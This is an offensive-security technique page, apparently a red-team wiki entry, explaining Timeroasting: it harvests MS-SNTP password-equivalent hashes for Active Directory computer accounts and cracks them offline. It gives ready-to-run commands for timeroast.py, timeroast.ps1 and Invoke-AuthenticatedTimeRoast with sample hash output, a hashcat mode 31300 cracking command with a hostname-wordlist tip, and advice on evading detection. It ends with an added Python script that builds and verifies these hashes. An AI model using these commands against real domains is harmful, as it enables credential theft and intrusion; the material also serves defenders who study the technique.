Timeroasting

Last updated 1 month ago

Description

Domain-joined computers typically synchronize their clocks using the Network Time Protocol (NTP), with a Domain Controller (DC) acting as the time source. However, traditional NTP lacks authentication, making it vulnerable to man-in-the-middle (MitM) attacks where an adversary could spoof responses and manipulate the client’s system time.

To mitigate this risk, Microsoft implemented a proprietary extension to NTP that introduces cryptographic authentication. When a computer sends an NTP request, it includes its Relative Identifier (RID) in a special extension field. The Domain Controller responds by appending a Message Authentication Code (MAC) to the response, generated using the NTLM (MD4) hash of the computer account's password as the key.

Crucially, the client does not need to authenticate to the DC in order to make this request. It can simply specify any RID, and the DC will look up the corresponding computer account and generate a response using its password hash.

While this design addresses time spoofing concerns, it introduces a significant security side effect: unauthenticated clients can effectively request salted password hashes for any computer account in the domain. In theory, this isn't a concern if all computer passwords are long, random, and machine-generated — but that's not always true in practice.

As a result, this NTP extension can be abused to harvest password-equivalent hashes for offline cracking, particularly targeting computer accounts with weak or misconfigured passwords.

Reference: the Secura Timeroasting whitepaper (linked under URL below).

Unauthenticated

As discussed in the whitepaper, this attack works from an unauthenticated perspective. The only slight roadblock is that the RIDs of any cracked hashes then have to be resolved back to their respective computer names.

Linux

GitHub: timeroast.py from SecuraBV/Timeroast (linked under URL below).

python3 timeroast.py 10.10.10.100
Output
1000:$sntp-ms$fa0df21ba416b39aa192bb06963714f4$1c0111e900000000000a649c4c4f434ceba3...
1104:$sntp-ms$d9704f7ad11724ad7bee71afbe1e5db5$1c0111e900000000000a649c4c4f434ceba3...
1165:$sntp-ms$66a3515011c09903bc16c8a2cb5c31f6$1c0111e900000000000a649d4c4f434ceba3...
1166:$sntp-ms$e704e60d2a7ee3d8792925c72d6634b9$1c0111e900000000000a649d4c4f434ceba3...

Windows

. .\timeroast.ps1
Output
1000:$sntp-ms$73d9d6aa36e20f7e6a0305de31f4caea$1c0111e900000000000a6c304c4f434ceba33c67e3304da5e1b8428bffbfcd0aeba3...
1104:$sntp-ms$e0d04e3046d323951806eebf45ba9f83$1c0111e900000000000a6c314c4f434ceba33c67e3528d6be1b8428bffbfcd0aeba3...
1165:$sntp-ms$27ce4356ae08450bab8e427fbaf07fc7$1c0111e900000000000a6c324c4f434ceba33c67e347e3c4e1b8428bffbfcd0aeba3...
1166:$sntp-ms$1187bae435e15f9aca9a032b54f13e1f$1c0111e900000000000a6c324c4f434ceba33c67e3b8c9e0e1b8428bffbfcd0aeba3...

Authenticated

It's clear from the research around Timeroasting why this technique can be an attractive initial access vector, especially in scenarios where no credentials are available. However, performing Timeroasting from an authenticated perspective also has its own distinct advantages.

Firstly, when authenticated, we can resolve RIDs to hostnames automatically. This significantly simplifies attribution — allowing us to map each SNTP hash back to the corresponding computer account in Active Directory.

Secondly, one could argue that Timeroasting from an authenticated context may seem redundant. After all, if our goal is to obtain hashes for computer accounts, we could simply modify tools like Rubeus or Invoke-Kerberoast, which typically filter only for user objects with Service Principal Names (SPNs). With minimal adjustments, these tools could be extended to include computer objects as well. That said, this approach is rarely used in practice, largely because computer accounts typically use long, random, and machine-generated passwords — making them infeasible to crack unless there's a misconfiguration or weak password policy in place (e.g., set during manual provisioning or imaging).

Interestingly, SNTP hashes obtained through Timeroasting can be cracked approximately 10x faster than traditional Kerberos 5 TGS-REP (etype 23) hashes. While this still doesn't make cracking a randomly generated machine password likely, it does significantly improve the odds when weak passwords are involved — particularly in environments with lax onboarding procedures or poor password hygiene.

Lastly, requesting SPNs for all computer accounts in the domain (as done during Kerberoasting) is far noisier from an OPSEC standpoint. While Timeroasting does generate network traffic for each requested system, it's still a relatively obscure technique. As a result, it's more likely to slip under the radar of typical detection pipelines, making it an attractive alternative when stealth is a priority.

TL;DR

Timeroasting is a solid option for both unauthenticated and authenticated access. Authenticated use allows easier mapping of SNTP hashes to hostnames, but may seem redundant since Kerberoasting can be adapted to target computer accounts. However, SNTP hashes crack 10x faster than Kerberos TGS-REP hashes, improving chances of success against weak passwords. Plus, Timeroasting is stealthier than mass SPN enumeration, making it more OPSEC-friendly and a valuable alternative in red team ops.

# Default Execution
Invoke-AuthenticatedTimeRoast -DomainController 10.10.10.100

# Generate wordlist based on computer names
Invoke-AuthenticatedTimeRoast -DomainController 10.10.10.100 -GenerateWordlist
Output
DC01:$sntp-ms$4b7afe1572d2d273d25ae570dd1126a7$1c0111e900000000000a6ca74c4f43...
WS01:$sntp-ms$5c475eb8012429bf9a91c96c993cfb66$1c0111e900000000000a6ca74c4f43...
Test06:$sntp-ms$7486e4dd0c30b8858c64e52b037df7fb$1c0111e900000000000a6ca74c4f43...
Test09:$sntp-ms$d4ec232496d37575b1dbe7e1ef22cd7b$1c0111e900000000000a6ca74c4f43...

Hashcat

At the time of writing, the beta version of hashcat is required to crack SNTP hashes (mode 31300).

In addition to using common wordlists and rule sets, it's important to include a wordlist of all computer names (lowercased, without the trailing $). This helps catch cases where the computer password matches the hostname—a pattern often seen when accounts are created using the net computer command or the "Assign this computer account as a pre-Windows 2000 Computer" option in the GUI.

hashcat.exe -m 31300 -a 0 -O hashes.txt rockyou.txt --username
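Added example (not code from the page or from the SecuraBV tooling) covering both the MAC construction in the Description and the $sntp-ms$ format consumed by hashcat mode 31300 above: the DC's authenticator is MD5 over the computer account's NT hash (MD4 of the UTF-16LE password) followed by the first 48 bytes of the NTP reply, which is exactly why a defender should treat every reply as a password-equivalent hash. The RID, the NT hash and the 48-byte reply are constructed values (the reply header bytes are borrowed from the sample output above); MD4 is not computed here, the NT hash is passed in as bytes.

```python
import hashlib
import hmac
import re

# One line of timeroast.py / hashcat mode 31300 input:
#   "<rid or hostname>:$sntp-ms$<md5 mac, 32 hex>$<first 48 reply bytes, 96 hex>"
LINE_RE = re.compile(
    r"^(?P<acct>[^:]+):\$sntp-ms\$(?P<mac>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$"
)


def ms_sntp_mac(nt_hash: bytes, reply48: bytes) -> bytes:
    """Authenticator the DC appends to an MS-SNTP reply: MD5(NT hash || reply[:48])."""
    if len(nt_hash) != 16 or len(reply48) != 48:
        raise ValueError("NT hash must be 16 bytes and the reply prefix 48 bytes")
    return hashlib.md5(nt_hash + reply48).digest()


def encode_line(acct: str, nt_hash: bytes, reply48: bytes) -> str:
    """Build the hashcat line a simulated DC reply would produce for this account."""
    return f"{acct}:$sntp-ms${ms_sntp_mac(nt_hash, reply48).hex()}${reply48.hex()}"


def parse_line(line: str):
    """Split a $sntp-ms$ line into (account, mac bytes, 48-byte salt); reject other formats."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a $sntp-ms$ line: {line!r}")
    return m["acct"], bytes.fromhex(m["mac"]), bytes.fromhex(m["salt"])


def verify(line: str, nt_hash: bytes) -> bool:
    """True when nt_hash reproduces the MAC on the line, i.e. the line is a keyed
    hash of that account's password (this single MD5 is all a cracker tests per guess)."""
    _, mac, salt = parse_line(line)
    return hmac.compare_digest(ms_sntp_mac(nt_hash, salt), mac)


# Constructed sample: NTP header bytes from the sample output above (LI/VN/mode 0x1c,
# stratum 1, refid "LOCL") padded to 48 bytes, and an arbitrary, not real, NT hash.
SAMPLE_REPLY = bytes.fromhex("1c0111e900000000000a6c304c4f434c") + bytes(32)
SAMPLE_NT = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_LINE = encode_line("1104", SAMPLE_NT, SAMPLE_REPLY)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("verifies with correct NT hash:", verify(SAMPLE_LINE, SAMPLE_NT))
    print("verifies with wrong NT hash:  ", verify(SAMPLE_LINE, bytes(16)))
```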

Invoke-AuthenticatedTimeRoast can be used to better support Timeroasting from an authenticated perspective (GitHub repository linked under URL below).

URL:

https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf
https://github.com/SecuraBV/Timeroast/blob/main/timeroast.py
https://github.com/SecuraBV/Timeroast/blob/main/timeroast.ps1
https://github.com/The-Viper-One/Invoke-AuthenticatedTimeRoast
https://hashcat.net/beta/